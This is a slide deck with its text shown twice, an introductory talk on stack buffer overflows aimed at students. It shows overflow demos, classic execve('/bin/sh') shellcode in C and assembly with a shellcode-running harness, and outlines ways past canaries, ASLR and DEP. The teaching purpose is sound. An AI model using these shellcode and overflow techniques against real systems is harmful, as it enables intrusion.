QW
Uploaded byQuinn Wilton
PPTX, PDF1,034 views

Software to the slaughter

The document discusses the anatomy and exploitation of computer memory stacks in relation to security vulnerabilities, particularly through buffer overflow attacks. It explains how attackers can manipulate the stack to execute arbitrary code, known as shellcode, and outlines various defensive techniques like stack canaries, address space layout randomization, and data execution prevention. The author encourages participation in competitive hacking events to gain practical experience in exploit development.

Embed presentation

Download to read offline
Software to the Slaughter Shane Wilton
Who am I?
TL;DR I hack stuff.
Agenda 1. Anatomy of a stack 2. Smashing it 3. Real (wo)men program in shellcode 4. Canaries, DEP, and ASLR, oh my! 5. Hack the planet.
WTF is a stack?!? ● Three types of memory regions: a. Text  Program code, read-only b. Data  Static variables  The heap c. Stack  Where the magic happens
Data Structures 101 - Stacks ● An abstract data type with two operations o PUSH - Adds an element to the start of a collection o POP - Removes an element from the end of a collection ● Last-In-First-Out o Imagine a stack of paper
...and that’s useful because? ● Used to implement functions at a low-level ● Returning from procedures, passing arguments, etc
Calling a Function void foo(int a, int b) { char buffer[10]; } void main() { foo(1, 2); } ● Push the arguments onto the stack, in reverse order ● Push the instruction pointer onto the stack ● Allocate space for the variables in foo
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp SP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp 2 SP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp 1 2 SP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Return Address (EIP) 1 2 SP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 SP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 SP and FP Heap
Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 FP 12-Byte Buffer SP Heap
Returning From a Function 1. POP the old frame pointer off FP 2. Set SP to this value 3. POP the return address off the stack 4. Jump to this address Old Frame Pointer (EBP) Return Address (EIP) 1 2 FP 12-Byte Buffer SP Heap
What does this mean? ● If unchecked, the buffer can overrun into the rest of the stack! ● Buffer overflow attack o Overwrite return address o Overwrite local variables o Own the system. ● What if we fill the buffer with: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA….
Segmentation Fault! Heap 12-Byte Buffer Old Frame Pointer (EBP) Return Address (EIP) 1 2 Heap 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141
Returning Fr- wait what? void bar() { printf(“Hack the North!”); } void foo(int a, int b) { char buffer[10]; int *ret; ret = buffer + 12; (*ret) = &bar; } ● foo overwrites an address after the buffer to point to bar ● We just overwrote foo’s return address! ● An attacker can use this for evil. o Assume the buffer is filled with unchecked user input
Shellcode, or How I learned to Stop Worrying and Love the Compiler ● By overwriting the return address, we can run any code in the program o What if the code we want isn’t in the program? o Add it! Put our code in the buffer, and jump to it ● We need bytecode that will spawn a shell - shellcode!
Putting the ‘C” in Shellcode #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } $ gcc -o shellcode -ggdb -static shellcode.c $ gdb shellcode $ disassemble main 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret
WTF does that mean? 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret 0x8000130 <main>: Save the frame pointer 0x8000131 <main+1>: Move the stack pointer 0x8000133 <main+3>: Allocate space for the ‘name’ buffer 0x8000136 <main+6>: Copy the address of “/bin/sh” into the buffer 0x800013d <main+13>: Copy NULL into the buffer 0x8000144 <main+20>: Push NULL onto the stack 0x8000146 <main+22>: Load the address of our buffer into EAX 0x8000149 <main+25>: Push that address onto the stack 0x800014a <main+26>: Load the address of ‘/bin/sh’ into EAX 0x800014d <main+29>: Push that address onto the stack 0x800014e <main+30>: Call execve
And now for execve... ● Disassemble execve too ● Not going to show it here, but go through the same process. ● We need… o EAX = 0xB o ECX points to “/bin/sh” o EDX points to NULL ● Then call “int $0x80”
Let’s write that in assembly... jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 .string "/bin/sh" ● Compile this with NASM, and grab the hexadecimal representation… ● xebx2ax5ex89x76 x08xc6x46x07x00 xc7x46x0cx00x00 x00… etc ● Watch this.
Shellcoder? I hardly know her! char shellcode[] = <our shellcode>; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } shane $ gcc -o sc sc.c shane $ ./sc $ exit shane $
Putting It Together ● Find a buffer overflow ● Find a way of exploiting it ● Fill some buffer with shellcode ● Use your overflow to jump to it
It’s not that easy. ● Nowadays, operating systems are smarter than that ● Shellcode restrictions o No NULL bytes allowed o Only alphanumeric characters, etc ● Stack Canaries ● Address Space Layout Randomization ● Data Execution Prevention ● We can defeat all of these methods.
Stack Canaries ● Essentially checksums ● Placed after a buffer o Overflowing the buffer will overwrite the canary o If the canary is wrong, handle the overflow ● Generated by the compiler. ● Use another exploit to leak memory o printf format string exploits for example
ASLR ● At runtime, randomize the positions of important memory regions o The stack, the heap, data segment, etc ● Like stack canaries, need a memory leak to bypass o Leak the address of a buffer o Create a NOP-sled and guess o Plenty of techniques
Data Execution Prevention ● Mark memory segments as either writable or executable o Never both! ● We can’t put our shellcode on the stack anymore. ● Use return-oriented programming
Return-Oriented Programming ● Construct our payload entirely of “Gadgets” found in the existing codes o Sub-sequences of assembly found at the end of existing functions ● Chain them together by overwriting return addresses on the stack ● Always possible!*
Nothing is Safe. ● Exploit development is hard. o Really hard. o Target architectures you’ve never used before o Fail cleanly to avoid detection ● But! o No protection is infallible o It’s fun. Like, really fun. More on this later.
You Can (and should) do it! ● Capture the Flag - competitive hacking o The hackathons of security o There’s always one going on  CSAW is running right now, it’s for college students with no security experience ● Incredibly fun problems. o For example...
Polyglot ● Write an exploit that will run on four machines o x86 o ARM Little-Endian o ARM Big-Endian o PowerPC ● Insane implications for the internet of things ● Read my talk on solving it with graph theory
Getting Started ● Micro Corruption - a 20 problem CTF built by Square and Matasano Security for teaching exploit development ● Compete! Right now! Seriously, this weekend! o CSAW - You can solve some of these, I promise.

More Related Content

PPTX
08 - Return Oriented Programming, the chosen one
byAlexandre Moneger
 
PDF
One Shellcode to Rule Them All: Cross-Platform Exploitation
byQuinn Wilton
 
PPTX
Hacking - high school intro
byPeter Hlavaty
 
PDF
Low Level Exploits
byhughpearse
 
PPTX
Back to the CORE
byPeter Hlavaty
 
PPTX
Vulnerability desing patterns
byPeter Hlavaty
 
PPTX
Attack on the Core
byPeter Hlavaty
 
PPTX
Ice Age melting down: Intel features considered usefull!
byPeter Hlavaty
 
08 - Return Oriented Programming, the chosen one
byAlexandre Moneger
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
byQuinn Wilton
 
Hacking - high school intro
byPeter Hlavaty
 
Low Level Exploits
byhughpearse
 
Back to the CORE
byPeter Hlavaty
 
Vulnerability desing patterns
byPeter Hlavaty
 
Attack on the Core
byPeter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
byPeter Hlavaty
 

What's hot

PPTX
An introduction to ROP
bySaumil Shah
 
PDF
ROP 輕鬆談
byhackstuff
 
PPT
Advance ROP Attacks
byn|u - The Open Security Community
 
PDF
Course lecture - An introduction to the Return Oriented Programming
byJonathan Salwan
 
PDF
Rainbow Over the Windows: More Colors Than You Could Expect
byPeter Hlavaty
 
PPT
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
byRootedCON
 
PPTX
How Functions Work
bySaumil Shah
 
PPTX
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
byPeter Hlavaty
 
PPTX
Return Oriented Programming (ROP) Based Exploits - Part I
byn|u - The Open Security Community
 
PPTX
Dive into ROP - a quick introduction to Return Oriented Programming
bySaumil Shah
 
PDF
How to Root 10 Million Phones with One Exploit
byJiahong Fang
 
PDF
Triton and symbolic execution on gdb
byWei-Bo Chen
 
PPTX
Racing with Droids
byPeter Hlavaty
 
PPTX
Return oriented programming (ROP)
byPipat Methavanitpong
 
PDF
DeathNote of Microsoft Windows Kernel
byPeter Hlavaty
 
PDF
When is something overflowing
byPeter Hlavaty
 
PDF
Return oriented programming
byhybr1s
 
PPTX
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
byPeter Hlavaty
 
PPTX
How Safe is your Link ?
byPeter Hlavaty
 
PPTX
Guardians of your CODE
byPeter Hlavaty
 
An introduction to ROP
bySaumil Shah
 
ROP 輕鬆談
byhackstuff
 
Advance ROP Attacks
byn|u - The Open Security Community
 
Course lecture - An introduction to the Return Oriented Programming
byJonathan Salwan
 
Rainbow Over the Windows: More Colors Than You Could Expect
byPeter Hlavaty
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
byRootedCON
 
How Functions Work
bySaumil Shah
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
byPeter Hlavaty
 
Return Oriented Programming (ROP) Based Exploits - Part I
byn|u - The Open Security Community
 
Dive into ROP - a quick introduction to Return Oriented Programming
bySaumil Shah
 
How to Root 10 Million Phones with One Exploit
byJiahong Fang
 
Triton and symbolic execution on gdb
byWei-Bo Chen
 
Racing with Droids
byPeter Hlavaty
 
Return oriented programming (ROP)
byPipat Methavanitpong
 
DeathNote of Microsoft Windows Kernel
byPeter Hlavaty
 
When is something overflowing
byPeter Hlavaty
 
Return oriented programming
byhybr1s
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
byPeter Hlavaty
 
How Safe is your Link ?
byPeter Hlavaty
 
Guardians of your CODE
byPeter Hlavaty
 

Similar to Software to the slaughter

PDF
Exploitation Crash Course
byUTD Computer Security Group
 
PPT
Writing Metasploit Plugins
byamiable_indian
 
PPT
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
PDF
StackOverflow
bySusam Pal
 
PDF
The Stack and Buffer Overflows
byUTD Computer Security Group
 
ODP
Exploiting Memory Overflows
byAnkur Tyagi
 
PDF
Buffer Overflows in cybersecurity notes .pdf
byavinashspider018
 
PDF
AllBits presentation - Lower Level SW Security
byAllBits BVBA (freelancer)
 
PPTX
Buffer overflow attacks
byJapneet Singh
 
PDF
Buffer Overflow - Smashing the Stack
byironSource
 
PPT
Ch03-bufferOverFlow-attack-Ch03-bufferOverFlow-attack.ppt.ppt
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPT
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
PPTX
Control hijacking
byPrachi Gulihar
 
PDF
Smashing the Buffer
byMiroslav Stampar
 
PDF
[ENG] Hacktivity 2013 - Alice in eXploitland
byZoltan Balazs
 
PDF
Buffer overflow tutorial
byhughpearse
 
PPT
Software Exploits
byKevinCSmallwood
 
PPTX
Buffer overflow – Smashing The Stack
byTomer Zait
 
PDF
Format String Vulnerability
byJian-Yu Li
 
PDF
CNIT 127 14: Protection Mechanisms
bySam Bowne
 
Exploitation Crash Course
byUTD Computer Security Group
 
Writing Metasploit Plugins
byamiable_indian
 
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
StackOverflow
bySusam Pal
 
The Stack and Buffer Overflows
byUTD Computer Security Group
 
Exploiting Memory Overflows
byAnkur Tyagi
 
Buffer Overflows in cybersecurity notes .pdf
byavinashspider018
 
AllBits presentation - Lower Level SW Security
byAllBits BVBA (freelancer)
 
Buffer overflow attacks
byJapneet Singh
 
Buffer Overflow - Smashing the Stack
byironSource
 
Ch03-bufferOverFlow-attack-Ch03-bufferOverFlow-attack.ppt.ppt
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
E-Commerce Security - Application attacks - Server Attacks
byphanleson
 
Control hijacking
byPrachi Gulihar
 
Smashing the Buffer
byMiroslav Stampar
 
[ENG] Hacktivity 2013 - Alice in eXploitland
byZoltan Balazs
 
Buffer overflow tutorial
byhughpearse
 
Software Exploits
byKevinCSmallwood
 
Buffer overflow – Smashing The Stack
byTomer Zait
 
Format String Vulnerability
byJian-Yu Li
 
CNIT 127 14: Protection Mechanisms
bySam Bowne
 

Recently uploaded

PDF
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
PPTX
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
PDF
Healthcare Mobile App Development: Features & Benefits
byjoealwyn38
 
PPTX
Lect 1 Number systems and base conversions. [Autosaved].pptx
byzainiman8511
 
PDF
Cloud Automotive Software: Cost, Speed & Scalability
byShiv Technolabs Pvt. Ltd.
 
PDF
Enterprise Software’s Role in Data-Driven Decisions
byShiv Technolabs Pvt. Ltd.
 
PDF
IT Estate Modernization Solutions for Cloud-Ready Businesses.pdf
byAstuteBusiness
 
PDF
DSD-INT 2025 Large scale unsaturated zone modelling - Sequential Steady State...
byDeltares
 
PDF
The Future of Microsoft Project Management Tools - Connecting Teams, Work, an...
byOnePlan Solutions
 
PDF
Shaping Your 2026 Testing Strategy | Applitools Product Pulse - January 2026
byApplitools
 
PDF
828275126-INTUNE-Instructor-Handout-Part2.pdf
byamdusias67
 
PPTX
Orion Context Broker introduction 20260114
byFermin Galan
 
PDF
Hack&Verse Kick-off and infor session Event ppt
bysanidhyasahu1120
 
PDF
Incident Management Roles & Responsibilities.pdf
byTaskCall
 
PPTX
Introduction to Software Development and Modern Practices
byM Munim
 
PPTX
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
PPTX
NetworkMediaWireless (1).pptxunsnsndjdjdjjdnd
byre7022
 
PPTX
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 
PPTX
Architectural Styles in Software Engineering
byM Munim
 
PPTX
Project System Presentation details process presentation
bytejpratappandey4
 
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
Healthcare Mobile App Development: Features & Benefits
byjoealwyn38
 
Lect 1 Number systems and base conversions. [Autosaved].pptx
byzainiman8511
 
Cloud Automotive Software: Cost, Speed & Scalability
byShiv Technolabs Pvt. Ltd.
 
Enterprise Software’s Role in Data-Driven Decisions
byShiv Technolabs Pvt. Ltd.
 
IT Estate Modernization Solutions for Cloud-Ready Businesses.pdf
byAstuteBusiness
 
DSD-INT 2025 Large scale unsaturated zone modelling - Sequential Steady State...
byDeltares
 
The Future of Microsoft Project Management Tools - Connecting Teams, Work, an...
byOnePlan Solutions
 
Shaping Your 2026 Testing Strategy | Applitools Product Pulse - January 2026
byApplitools
 
828275126-INTUNE-Instructor-Handout-Part2.pdf
byamdusias67
 
Orion Context Broker introduction 20260114
byFermin Galan
 
Hack&Verse Kick-off and infor session Event ppt
bysanidhyasahu1120
 
Incident Management Roles & Responsibilities.pdf
byTaskCall
 
Introduction to Software Development and Modern Practices
byM Munim
 
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
NetworkMediaWireless (1).pptxunsnsndjdjdjjdnd
byre7022
 
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 
Architectural Styles in Software Engineering
byM Munim
 
Project System Presentation details process presentation
bytejpratappandey4
 

Software to the slaughter

  • 1.
    Software to theSlaughter Shane Wilton
  • 2.
  • 3.
  • 4.
    Agenda 1. Anatomyof a stack 2. Smashing it 3. Real (wo)men program in shellcode 4. Canaries, DEP, and ASLR, oh my! 5. Hack the planet.
  • 5.
    WTF is astack?!? ● Three types of memory regions: a. Text  Program code, read-only b. Data  Static variables  The heap c. Stack  Where the magic happens
  • 6.
    Data Structures 101- Stacks ● An abstract data type with two operations o PUSH - Adds an element to the start of a collection o POP - Removes an element from the end of a collection ● Last-In-First-Out o Imagine a stack of paper
  • 7.
    ...and that’s usefulbecause? ● Used to implement functions at a low-level ● Returning from procedures, passing arguments, etc
  • 8.
    Calling a Function void foo(int a, int b) { char buffer[10]; } void main() { foo(1, 2); } ● Push the arguments onto the stack, in reverse order ● Push the instruction pointer onto the stack ● Allocate space for the variables in foo
  • 9.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp SP Heap
  • 10.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp 2 SP Heap
  • 11.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp 1 2 SP Heap
  • 12.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Return Address (EIP) 1 2 SP Heap
  • 13.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 SP Heap
  • 14.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 SP and FP Heap
  • 15.
    Calling a Function pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $12, %esp Old Frame Pointer (EBP) Return Address (EIP) 1 2 FP 12-Byte Buffer SP Heap
  • 16.
    Returning From aFunction 1. POP the old frame pointer off FP 2. Set SP to this value 3. POP the return address off the stack 4. Jump to this address Old Frame Pointer (EBP) Return Address (EIP) 1 2 FP 12-Byte Buffer SP Heap
  • 17.
    What does thismean? ● If unchecked, the buffer can overrun into the rest of the stack! ● Buffer overflow attack o Overwrite return address o Overwrite local variables o Own the system. ● What if we fill the buffer with: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA….
  • 18.
    Segmentation Fault! Heap 12-Byte Buffer Old Frame Pointer (EBP) Return Address (EIP) 1 2 Heap 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141
  • 19.
    Returning Fr- waitwhat? void bar() { printf(“Hack the North!”); } void foo(int a, int b) { char buffer[10]; int *ret; ret = buffer + 12; (*ret) = &bar; } ● foo overwrites an address after the buffer to point to bar ● We just overwrote foo’s return address! ● An attacker can use this for evil. o Assume the buffer is filled with unchecked user input
  • 20.
    Shellcode, or HowI learned to Stop Worrying and Love the Compiler ● By overwriting the return address, we can run any code in the program o What if the code we want isn’t in the program? o Add it! Put our code in the buffer, and jump to it ● We need bytecode that will spawn a shell - shellcode!
  • 21.
    Putting the ‘C”in Shellcode #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } $ gcc -o shellcode -ggdb -static shellcode.c $ gdb shellcode $ disassemble main 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret
  • 22.
    WTF does thatmean? 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret 0x8000130 <main>: Save the frame pointer 0x8000131 <main+1>: Move the stack pointer 0x8000133 <main+3>: Allocate space for the ‘name’ buffer 0x8000136 <main+6>: Copy the address of “/bin/sh” into the buffer 0x800013d <main+13>: Copy NULL into the buffer 0x8000144 <main+20>: Push NULL onto the stack 0x8000146 <main+22>: Load the address of our buffer into EAX 0x8000149 <main+25>: Push that address onto the stack 0x800014a <main+26>: Load the address of ‘/bin/sh’ into EAX 0x800014d <main+29>: Push that address onto the stack 0x800014e <main+30>: Call execve
  • 23.
    And now forexecve... ● Disassemble execve too ● Not going to show it here, but go through the same process. ● We need… o EAX = 0xB o ECX points to “/bin/sh” o EDX points to NULL ● Then call “int $0x80”
  • 24.
    Let’s write thatin assembly... jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 .string "/bin/sh" ● Compile this with NASM, and grab the hexadecimal representation… ● xebx2ax5ex89x76 x08xc6x46x07x00 xc7x46x0cx00x00 x00… etc ● Watch this.
  • 25.
    Shellcoder? I hardlyknow her! char shellcode[] = <our shellcode>; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } shane $ gcc -o sc sc.c shane $ ./sc $ exit shane $
  • 26.
    Putting It Together ● Find a buffer overflow ● Find a way of exploiting it ● Fill some buffer with shellcode ● Use your overflow to jump to it
  • 27.
    It’s not thateasy. ● Nowadays, operating systems are smarter than that ● Shellcode restrictions o No NULL bytes allowed o Only alphanumeric characters, etc ● Stack Canaries ● Address Space Layout Randomization ● Data Execution Prevention ● We can defeat all of these methods.
  • 28.
    Stack Canaries ●Essentially checksums ● Placed after a buffer o Overflowing the buffer will overwrite the canary o If the canary is wrong, handle the overflow ● Generated by the compiler. ● Use another exploit to leak memory o printf format string exploits for example
  • 29.
    ASLR ● Atruntime, randomize the positions of important memory regions o The stack, the heap, data segment, etc ● Like stack canaries, need a memory leak to bypass o Leak the address of a buffer o Create a NOP-sled and guess o Plenty of techniques
  • 30.
    Data Execution Prevention ● Mark memory segments as either writable or executable o Never both! ● We can’t put our shellcode on the stack anymore. ● Use return-oriented programming
  • 31.
    Return-Oriented Programming ●Construct our payload entirely of “Gadgets” found in the existing codes o Sub-sequences of assembly found at the end of existing functions ● Chain them together by overwriting return addresses on the stack ● Always possible!*
  • 32.
    Nothing is Safe. ● Exploit development is hard. o Really hard. o Target architectures you’ve never used before o Fail cleanly to avoid detection ● But! o No protection is infallible o It’s fun. Like, really fun. More on this later.
  • 33.
    You Can (andshould) do it! ● Capture the Flag - competitive hacking o The hackathons of security o There’s always one going on  CSAW is running right now, it’s for college students with no security experience ● Incredibly fun problems. o For example...
  • 34.
    Polyglot ● Writean exploit that will run on four machines o x86 o ARM Little-Endian o ARM Big-Endian o PowerPC ● Insane implications for the internet of things ● Read my talk on solving it with graph theory
  • 35.
    Getting Started ●Micro Corruption - a 20 problem CTF built by Square and Matasano Security for teaching exploit development ● Compete! Right now! Seriously, this weekend! o CSAW - You can solve some of these, I promise.